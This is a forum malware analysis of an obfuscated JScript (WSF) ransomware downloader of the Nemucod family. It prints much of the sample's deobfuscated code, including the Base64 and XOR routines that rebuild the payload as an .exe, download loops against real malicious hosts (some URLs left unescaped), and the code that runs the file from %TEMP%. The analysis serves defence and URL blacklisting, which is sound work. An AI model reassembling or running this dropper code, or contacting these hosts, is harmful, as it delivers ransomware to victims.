Malware Analysis 824643807708.wsf-dropper-JS_NEMUCOD.SMK2

DardiM

824643807708.wsf
From last pack sample on Malware Vault 23-8-16 #4
(Thanks to @Solarquest)

Below is the analysis of the downloader Script, not of the ransomware

5/54 when I make this post
Antivirus scan for 1b852154ce304baa140fc77585a3c067cfc2ddc620a941e6946d1cae87b14739 at 2016-08-23 14:14:04 UTC - VirusTotal

This sample uses almost the same obfuscation methods as a sample seen in a previous post:
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178
they just simplified / cleaned some parts, and tried to make the URLs less easily "visible"

Script used : JScript

- code in a CDATA section of XML document

CDATA - Wikipedia, the free encyclopedia

Most important part (another part is for debugging)
<?xml?>
<package>

<job id='JHBKNM'><runtime>
<description>
</description>
</runtime><script language='JScript'><![CDATA[
.................]]
></script>
</job>
</package>

1) Let's look at the Script - strange very long string :

The well-known functions (see the previous analysis of JS/NEMUCOD) are obfuscated in the Script with an 8146-character string:

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2QxWzB4M0I0XT0weEVCOyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
...
...
heSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQztQzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNdPTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI.
...
9Ow==
".tttoooo();"

You can look at the tttoooo() function
In the previous version, they had named it ".manysecretthings()" :confused:

I deleted the "trash" parts of the names that were put there to assault our eyes :p
bestolochnaherPAPAPAM
bestolochnaherVIUVIUVIU

etc...
2) Let's look at the Script - Decoder function :

// Custom Base64 decoder hung on String.prototype. Before decoding it strips every
// occurrence of the junk token "GIBDDSHNIK" (so the encoded strings in the script
// do not look like plain Base64), then decodes 4 chars -> 3 bytes through the
// VITKS lookup table (the Base64 alphabet table built elsewhere in the script;
// non-alphabet chars hold -1 and are skipped). Returns the decoded string; a '='
// padding char ends the decode early.
// NOTE(review): sud() is not defined anywhere in this listing; from its use here
// it looks like a string-length helper - confirm against the sample.
String.prototype.tttoooo = function() {
// XCOP is assigned without var: an implicit global used as the read cursor.
XCOP = 0;
var ddDccC1, ddDccC2, c3, c4;
var sudarinaB = this;
// Step 1: remove every occurrence of the junk token.
sudarinaB= sudarinaB.
replace(/GIBDDSHNIK/g, '');
var out = "";
var len = sud(sudarinaB);

while (XCOP < len) {

// First sextet: advance past chars that are not in the Base64 alphabet (-1).
do {
ddDccC1 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
} while (XCOP < len && ddDccC1 == -1);
if (ddDccC1 == -1)
break;

// Second sextet, same skipping of non-alphabet chars.
var dodo = false;
do {

ddDccC2 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
dodo = XCOP < len && ddDccC2 == -1;
} while (dodo);

if (ddDccC2 == -1)
break;

// Byte 1 = the 6 bits of sextet 1 + the top 2 bits of sextet 2.
out += String.
fromCharCode((ddDccC1 << 2) | ((ddDccC2 & 0x30) >> 4));

// Third sextet. 10*6+0.5*2 == 61 == '=' : padding, so the decode is finished.
do {

c3 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c3 == 10*6+0.5*2)
return out;

c3 = VITKS[c3];
} while (XCOP < len && c3 == -1);

if (c3 == -1)
break;


// Byte 2 = the low 4 bits of sextet 2 + the top 4 bits of sextet 3.
out += String.fromCharCode(((ddDccC2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));

// Fourth sextet; 61 is '=' again.
do {

c4 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c4 == 61)
return out;

c4 = VITKS[c4];
} while (XCOP < len && c4 == -1);

if (c4 == -1)

break;
// Byte 3 = the low 2 bits of sextet 3 + the 6 bits of sextet 4.
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}

return out;
};
- "Oh, a complicated function, it will be difficult to decode the strings"
- "No, remember the other analogous sample and analysis I linked above..."

This function does not only do a Base64 decode: before decoding, it deletes some chars that were used to obfuscate the string further.

.replace(/GIBDDSHNIK/g, '')
It also uses an array to make the Base64 Decode

// Base64 alphabet lookup table, stored with every entry offset by -101 so that the
// literal shows no obvious 0..63 values. After the +101 loop below: index 43 ('+')
// -> 62, index 47 ('/') -> 63, '0'..'9' -> 52..61, 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51,
// and every -102 entry becomes -1 (= "not a Base64 char", which tttoooo() skips).
var VITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102);

// Undo the -101 offset in place, once, at script load.
var VITKI, VITKSn = VITKS.
length;
for (VITKI= 0; VITKI < VITKSn; ++VITKI) {

VITKS[VITKI] = VITKS[VITKI] + 101;
}
3) Let's look at the Script - Long String decoded :

What does the VERY long string look like once decoded?

// Reads the downloaded file at filePath as text decoded with code page 437
// (Charset = 437) and hands the string to fsta(), which maps the CP437 chars
// back to the original byte values.
// The bracket-property names are split across two lines in this listing (forum
// line-wrap); in the sample they are "type", "Charset", "open", "LoadFromFile",
// "ReadText" and "close".
function rtfta(filePath) {
var rosteks = WScript["CreateObject"]("ADODB.Stream");
// 2 = adTypeText
rosteks["
type"] = 2;
rosteks["
Charset"] = 437;
rosteks["
open"]();
rosteks["
LoadFromFile"](filePath);
// ReadText is used without parentheses; JScript's COM binding presumably still
// invokes it and returns the whole text - not verified here.
var fileString = rosteks["
ReadText"];
rosteks["
close"]();
return fsta(fileString);
};

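// Maps a string that was read as code page 437 back to the raw byte values it
// came from. Chars < 128 are kept as they are; chars >= 128 are looked up in the
// inverse CP437 table (Unicode code point -> byte 0x80..0xFF). Code points that
// are not in the table yield undefined, exactly like the original sparse lookup.
// Listing fix: the original had the property name "charCodeAt" split over two
// lines (forum line-wrap), which is not valid JS; it is a single token here.
// Returns an array of numbers, one entry per input char.
function fsta(fileString) {
// CP437 upper half: index = byte - 0x80, value = Unicode code point.
var cp437 = [
0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
];
// Inverse table: code point -> byte (sparse array, same shape as the original t1).
var t1 = new Array();
for (var k = 0; k < cp437.length; k++) {
t1[cp437[k]] = 0x80 + k;
}

var resultArray = new Array();
for (var Tj = 0; Tj < fileString["length"]; Tj++) {
var OVc9 = fileString["charCodeAt"](Tj);
// ASCII passes through; everything else goes through the inverse table.
resultArray["push"](OVc9 < 128 ? OVc9 : t1[OVc9]);
};

return resultArray;
};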

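// Inverse of fsta(): turns an array of byte values back into a string where a
// byte >= 0x80 becomes the code page 437 character for that byte (the table is
// the CP437 upper half, indexed by byte - 0x80). Bytes < 128 map to themselves.
// Listing fixes: a stray "a" token after the if/else in the original would throw
// a ReferenceError on every iteration, and the property names "length",
// "fromCharCode" and "join" were split over two lines by the forum line-wrap;
// all three are repaired here, nothing else changes.
// Returns the assembled string; an empty array gives "". Values outside 0..255
// (or undefined) give "\u0000", as with the original sparse-table lookup.
function fats(codeArray) {
// CP437 upper half: index = byte - 0x80, value = Unicode code point.
var cp437 = [
0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
];

var EGj = new Array();
for (var Tj = 0; Tj < codeArray["length"]; Tj++) {
var HIi3 = codeArray[Tj];
// ASCII passes through; 0x80..0xFF goes through the CP437 table.
var OVc9 = HIi3 < 128 ? HIi3 : cp437[HIi3 - 0x80];
EGj.push(String["fromCharCode"](OVc9));
}

return EGj["join"]("");
};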

// Writes the decoded byte array to filePath: fats() turns the bytes back into
// CP437 text and ADODB.Stream, opened with Charset 437, writes that text out so
// the file holds the original bytes again. In the visible script the caller
// (_a2) passes a path ending in ".exe".
// The bracket-property names are split across two lines in this listing (forum
// line-wrap): "type", "Charset", "open", "writeText", "SaveToFile", "close".
function satt(filePath, codeArray) {

var rosteks = WScript["CreateObject"]("ADODB.Stream");
// 2 = adTypeText
rosteks["
type"] = 2;
rosteks["
Charset"] = 437;
rosteks["
open"]();
rosteks["
writeText"](fats(codeArray));
// 2 = adSaveCreateOverWrite: an existing file at filePath is replaced.
rosteks["
SaveToFile"](filePath, 2);
rosteks["
close"]();
};

// XOR-decodes the byte array in place with the global xKey array, cycling the
// key over the data; returns the same (mutated) array.
function xdac(cca) {
var keyLen = xKey.length;
var total = cca["length"];
var idx = 0;
while (idx < total) {
cca[idx] = cca[idx] ^ xKey[Math.floor(idx % keyLen)];
idx++;
}
return cca;
};

We can see the well-known functions used to turn the obfuscated downloaded file (its content is modified, so it is not seen as an exe file when downloaded) into the real ransomware exe:

rtfta => loads the payload content and calls fsta(fileString)
xdac => deobfuscation with a XOR function, using the xKey Array
fsta => first "character substitution cipher" decoder, also used to obtain the xKey
fats => second "character substitution cipher" decoder
satt => calls the fats function and saves the file as a real ".exe"

and xKey => used for the main XOR decode part

This last var is now in the main Script part :

// XOR key for xdac(). Every char of this literal is ASCII (< 128), so fsta()
// returns just the char codes: a 32-entry key array.
var xKey = fsta("pxhMZi6AIY0OtsmRMnKeSwpSwoJtpSdT")

See this post : spoiler with details :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

4) Are the URLS used well obfuscated ? :

From the previous analysis of an analogous method:

// Download attempts from the previous sample: the URLs are only hidden with
// \uXXXX escapes, and each call is wrapped in a try/catch with an empty handler,
// so a failure is ignored and the next URL is tried. Shtyler4 is that sample's
// download function (not shown here).
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}


=> URLs obfuscation method : unescape Unicode


http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

This time they have "encoded" the URLs, and we need the decode function to know what chars have to be deleted before the Base64 decode:

"GIBDDSHNIK" has to be deleted

But we can recognize the same structure with a loop used :)

- Shtyler4 => _a2
- 3 strings in a tab => 3 urls to retrieve the payload

This time, one file name for the payload, and not 3 times the same payload with 3 different names once downloaded...:D

// The three download locations (host + path), Base64-encoded with the
// "GIBDDSHNIK" junk token inserted; tttoooo() strips the token and decodes them.
var _a5 = ["bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0","a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA==","emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="];

// uueee is assigned without var (implicit global). Every URL is passed to _a2
// with the same file name; the empty catch swallows errors and there is no
// break, so all three URLs are tried in turn even after a success.
for(uueee in _a5){

try{
_a2("http://"+_a5[uueee].tttoooo() + "?nTStkY=KsBazYnqnR","qcoPPlYEo");
}catch(_a3){}
}

First Step :

'bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0'
"a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="

'bWFqLmNsYWFzLmZyL0hKZ2hqYjU0"
"a291dG9rdWthbi53ZWIuZmMyLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaS5jb20vSEpnaGpiNTQ="

Second step :

=> using the Base64 Decode tool from notepad++ :

maj.claas.fr/HJghjb54
koutokukan.web.fc2.com/HJghjb54
zikunoana.houkou-onchi.com/HJghjb54

Third Step : concatenation

URLS (I wrote 'hxxp' to protect from miss-click):

hxxp://maj.claas.fr/HJghjb54?nTStkY=KsBazYnqnR
hxxp://koutokukan.web.fc2.com/HJghjb54?nTStkY=KsBazYnqnR
hxxp://zikunoana.houkou-onchi.com/HJghjb54?nTStkY=KsBazYnqnR

some Japanese links...
As detected with some comments from the sample
// 対象フォルダのサブフォルダ列挙 => Subfolder enumeration of the target folder
// サブフォルダ内のファイルを移動 => Move files in subfolders
// フォルダ内のファイル列挙 => Enumerate the files in the folder

// ファイルを移動 => Move the files
// ファイルとサブフォルダがなければフォルダ削除 => Delete the folder if there are no files and subfolders

Payload => file : qcoPPlYEo => qcoPPlYEo.exe if correctly deobfuscated by the script

5) Conclusion :

Previous similar sample :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

On the first,
- The URLs and payload names were very easy to retrieve, without needing to understand their decoding function and obfuscated parts.
- 3 different names for the same payload, downloaded from each available URL without any check => 3 ransomwares on your PC :p
- .exe added if all was ok.

In this sample, we only have to know that "GIBDDSHNIK" is the part to delete (all occurrences)
- 1 name for the downloaded obfuscated payload (without extension)
- .exe added if all was ok.​

In both samples, a lot of useless vars and functions, just to complicate things a bit more !?

In this sample some Japanese comments
These functions are too much "in the clear" to be real functions of the Script (testing parts !?)
(And never called :) )

// Recursive folder cleanup helper; the analysis above notes it is never called.
// For every entry of the global maskArr it tries to delete folderPath\<mask> as
// a file and as a folder (errors swallowed), then recurses into each subfolder.
// Note: maskArr is used without an index, so path is built from the whole array
// coerced to a string rather than from maskArr[i].
function ProcessFolder(folderPath)
{
var path = "";

for (var i in maskArr)
{

path = folderPath + "\\" + maskArr;

try { fsoObj.DeleteFile(path); } catch (e) {}
try { fsoObj.DeleteFolder(path); } catch (e) {}
}

// fsoObj is presumably a Scripting.FileSystemObject created elsewhere (not shown).
var subfolders = new Enumerator(fsoObj.GetFolder(folderPath).SubFolders);

for(; !subfolders.atEnd(); subfolders.moveNext())
ProcessFolder(subfolders.item().Path);
}
// Flattens a folder tree: recursively moves every file under folder into
// parentFolder, then deletes folders left empty. The analysis above notes it is
// never called (a leftover "testing" function). Comments translated from Japanese.
function moveToParentFolder(parentFolder, folder) {
// Enumerate the subfolders of the target folder
var subFolders = new Enumerator(folder.SubFolders);
// Move the files inside the subfolders (recursion)
for (; !subFolders.atEnd(); subFolders.moveNext()) {
moveToParentFolder(parentFolder, subFolders.item());
}
// Enumerate the files in the folder
var files = new Enumerator(folder.Files);
// Move the files
for (; !files.atEnd(); files.moveNext()) {
try {

files.item().Move(parentFolder.Path + '\\');
}
catch (e) {
// A failed move is only reported, then ignored
WScript.Echo(e.description + "\n" + files.item().Path);
}
}
// Delete the folder if it has no files and no subfolders left
if (folder.Files.Count == 0 && folder.SubFolders.Count == 0) {
try {

folder.Delete(true);
}
catch (e) {

WScript.Echo(e.description + "\n" + folder.Path);
}
}
}

In this family of obfuscated Script :

We just have to find the

.replace(/GIBDDSHNIK/g, '')
delete all its occurrences in the strings we want to decode,
copy-paste them into notepad++ (or another tool) => Base64 Decode,
and right after that get the URLs, to blacklist them.

To be able to retrieve the obfuscated payload, just a small part has to be modified on the Script :

- it is then possible to run the modified Script and wait to get the good obfuscated payload ...:cool:

But it is not the purpose of this analysis

See my precedent analysis of analogue sample :)
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178
and the post after, with complete deobfuscation for this precedent sample
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

To make the obfuscation they used a lot of different methods, and in my previous analysis I even said it was the first time I was seeing so many different methods in one Script.
But it was easy to get the URLS and payload names by looking directly the try...catch part at the end.
In this new sample, they tried to improve this part.

Below, what I said in precedent analysis conclusion :

CONCLUSION :

This current script tries to download 3 files (the same file, but it gives them 3 different names)
=> no part to see if one was already successfully downloaded :rolleyes:
=> no part to check whether the deobfuscation produced valid exe files (for example a check for "MZ" at the beginning of the file) :confused:

The obfuscation of the script is very well done by several methods, I have rarely seen as many different good methods in one file.
But : the URLs are VERY easy to be retrieved at the end of the file, in the try catch parts...:D
=> a simple unescape-Unicode method...
=> I got them since the beginning - see part 2)
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

So to End this Part 3 analysis :

=> "Why, plz why ?"
The only "good answer" would be : "downloading the obfuscated ransomware without the functions to deobfuscate it is useless"
=> "yes but it's too easy to black-list / report the URLs and file names used, and : we don't specially want to analyze the ransomwares" :p

It's also a (bad) way to quickly update the URLs / names parts when distributed ...

N.B: adding // (comment marker) to the "run" part line allows people to get the deobfuscated files (the last part of the function seen in the try...catch blocks). And also because we can see their names, which appear in clear (we just have to add ".exe" to the names) => easy to find them with a "search" on the HD after they are "ready" .exe files.

I put here a long part, we can see different methods (only for the 'beauty' :p )
I removed the bestolochnaherVIUVIUVIU and other parts added to the names

// Substitution map used by center(): each key is replaced (first occurrence only,
// String.replace with a string pattern) by its value. '88', '77', '99' delete junk
// digits, 'U'->'S', ':'->'.', 'CHAGNER'->'X'; 'VLOPH'->'ons' is also read directly
// in _a2 to build the property name "ResponseBody".
var qtcnthltqfqrhfq = {'U': 'S', ':': '.','88':'', '77':'','CHAGNER': 'X', '99':'', 'VLOPH':'ons'};

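// Junk helper: returns 2 when bidttt == 1 (loose equality, so "1" matches too),
// 17 otherwise. The original's trailing "return 3;" was unreachable and is dropped.
function achievment(bidttt) {
if (bidttt == 1) {
return 2;
}
return 17;
};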
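// Applies the qtcnthltqfqrhfq substitution map to rivulet: for each key, in
// for-in order, the first occurrence is replaced by its value. Used to rebuild
// ProgIDs such as "MSXML2.XMLHTTP" / "WScript.Shell" from junk-padded pieces.
// Fix: "request" was assigned without var (an implicit global, a ReferenceError
// in strict mode); it is a local now.
function center(rivulet) {
var request = rivulet;
for (var XCOP in qtcnthltqfqrhfq) {
request = request.replace(XCOP, qtcnthltqfqrhfq[XCOP]);
}
return request;
};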

// Always 0: the original expression 43 * (51 - 2) * (27 - 26 - 1) has a zero factor.
// Used as the start index of the substring() call in center2().
var DRUZA = 0;

// Junk: assigns to its own parameters from names (DDPOPSPOP, POPSPOPddd,
// POPSPOPZZ) that are not defined anywhere in the visible script, so calling
// it would throw. Only referenced from the dead !secupeku branches below.
function misterdenisk(POPSPOPx, POPSPOPy) {

POPSPOPx = DDPOPSPOP * POPSPOPddd;
POPSPOPy = POPSPOPZZ + 245;
};

// Environment check. After removing "GIBDDSHNIK" the Base64 is
// "V2luZG93cyBTY3JpcHQgSG9zdA==", i.e. "Windows Script Host", so secupeku is true
// only when String(WScript) + "87658123" equals "Windows Script Host87658123"
// (presumably the WScript object's string form under WSH - confirm) and the name
// GzEAPd is undefined. _a2 does the download/decode/run work only when it is
// true; an emulator that stringifies WScript differently only sees the junk branches.
var secupeku=(WScript +"87658123" =="GIBDDSHNIKV2lGIBDDSHNIKuZG93cyBTY3JpcGIBDDSHNIKHQgSG9zdA==".tttoooo() +"87658123")&&typeof(GzEAPd)==="undefined";

// Always 1 (the original wrote it as 0.5 * 2). Reused as the substring() end index
// in center2(), as the ADODB.Stream "type" value and as the Run() window style.
var chosen = 1;
// Dead branch: only entered when secupeku is false (not running under WSH).
// Defines a junk Point-like helper; XCOPsObject / XCOPsNumber are not defined
// in the visible script.
if(!secupeku){

misterdenisk.scale = function(p, scaleX, scaleY) {
if (XCOPsObject(scaleX)) {
scaleY = scaleX.y;
scaleX = scaleX.x;
} else if (!XCOPsNumber(scaleY)) {
scaleY = scaleX;
}
return new misterdenisk(p.x * scaleX, p.y * scaleY);
};
}

// Dead branch, same condition as above: two more junk helpers that nothing in
// the visible script calls.
if(!secupeku){

misterdenisk.sameOrN = function(param1, param2) {
return param1.D == param2.D || param1.F == param2.F;
};

misterdenisk.angle = function(p) {
return Math.atan2(p.y, p.x);
};
}

// "JVRFTVAl" decodes to "%TEMP%": the environment string expanded to get the drop folder.
var VARDOCF ="GIBDDSHNIKJVRFTVAlGIBDDSHNIK".tttoooo();
// "QWN0aXZlWE9iamVjdA==" decodes to "ActiveXObject": looked up on the global object below.
var finde = "QWN0aXZlWE9iamVjdAGIBDDSHNIK=GIBDDSHNIK=GIBDDSHNIK".tttoooo();
// "c3Vic3RyaW5n" decodes to "substring", so this is this.substring(DRUZA, chosen)
// = substring(0, 1): it returns the first character of the string. Used to
// extract single letters ("p", "s") from junk-padded strings.
String.prototype.center2 = function () {

var pirkinst = {
VARDOCG: this
};
pirkinst.VARDOCE = pirkinst.VARDOCG["c3VGIBDDSHNIKic3RyGIBDDSHNIKaW5GIBDDSHNIKn".tttoooo()](DRUZA, chosen);
return pirkinst.VARDOCE;
};

// "RXhwYW5kRW52aXJvbm1lbnRTdHJpbmdz" decodes to "ExpandEnvironmentStrings"
// (the WScript.Shell method used later to resolve "%TEMP%").
var sirdallos ="GIBDDSHNIKRXhwYW5GIBDDSHNIKkRW52aXGIBDDSHNIKJvbm1lbnRTdHJGIBDDSHNIKpbmdz".tttoooo();
// Junk: Native and its methods are never used in the visible script.
var Native = function(options){

};
Native.XCOPmplement = function(objects, properties){
for (var XCOP = 0, l = objects.length; XCOP < l; XCOP++) objects[XCOP].XCOPmplement(properties);
};
// Comma expressions evaluate to their last element, so center() receives
// "77M88SX99ML2.CHAGNERMLHTTP}WUcript:Shell" and returns
// "MSXML2.XMLHTTP}WScript.Shell": two ProgIDs separated by "}".
var d7 = center("77M"+"88SX"+"99ML"+("purposes","secured","environments","adhere","thoughtfulness","2.")+"CHAGNERM"+"LH"+"TT"+("intoxicating","insurmountable","hungary","dynamic","altitude","beverages","journalistic","prominent","P}")+"WU"+("trumps","stupidly","browse","stimulation","redound","corse","raspberry","cr")+("motherhood","tibetan","jockey","ronald","extended","derived","storing","saturnine","ip")+"t:S"+("welding","artifice","nationally","integration","exponent","census","personal","middling","h")+"e"+("cutter","stylish","booty","enclose","compliance","screenshot","jeweller","afford","ll"));
// Work queue consumed by shift()/pop() below:
// ["ActiveXObject", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run" ("UnVu"), d7]
var DoUtra = [finde, sirdallos,VARDOCF, ""+"."+("damage","passage","instruments","deviation","kerry","metrical","suburban","bereft","exe"), "UnGIBDDSHNIKVuGIBDDSHNIK".tttoooo(),d7];
// Richters = "ActiveXObject" (implicit global, no var)
Richters = DoUtra.shift();
fabled = "BIL2NEBIL";
// Junk: Native.genericize / Native.typize are never called; "args" and "$type"
// are not defined in the visible script.
Native.genericize = function(object, property, check){
if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){

return object.prototype[property].apply(args.shift(), args);
};
};
Native.typize = function(object, family){
if (!object.type) object.type = function(item){
return ($type(item) === family);
};
};
// LitoyDISK = this["ActiveXObject"]: the ActiveXObject constructor fetched by
// name from the global object, so the identifier never appears in clear.
var LitoyDISK = this[Richters ];
// center2() keeps the first char: casque = "p", tudabilo1 = "s"
casque = (("globe", "extricate", "tasmania", "overall", "unicameral", "scuba", "tangent", "pwrthrthrthtr") + "hrhrwhrwh").center2();
tudabilo1 = (("located", "blend", "partnerships", "arsenic", "thunderbolt", "defer", "threadbare", "shingles", "beckon", "serhrth") + "herrth4th4wh").center2();
// d2 = d7; rampart = new ActiveXObject("WScript.Shell"), sudabilo1 = new ActiveXObject("MSXML2.XMLHTTP")
var d2 = DoUtra.pop();
var rampart = new LitoyDISK(d2.split("}")[1]);
var sudabilo1 = new LitoyDISK(d2.split("}")[0]);
// vulture = rampart.ExpandEnvironmentStrings("%TEMP%"): the folder the payload is dropped in
var vulture = rampart[DoUtra.shift()](DoUtra.shift());
// "G" + weasel + "T" gives the HTTP verb used in _a2
var weasel = "E";

// amalgamation = ".exe", promises = "Run"
var amalgamation = DoUtra.shift();
var promises = DoUtra.shift();
// "b3Blbg==" decodes to "open" (used on both the XMLHTTP and the ADODB.Stream object)
var ostrokoncert = "b3GIBDDSHNIKBlbGIBDDSHNIKg==".tttoooo();


// Property name for the ADODB.Stream "type" assignment in _a2 (implicit global)
RhXxGud = "type";

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkN...
...
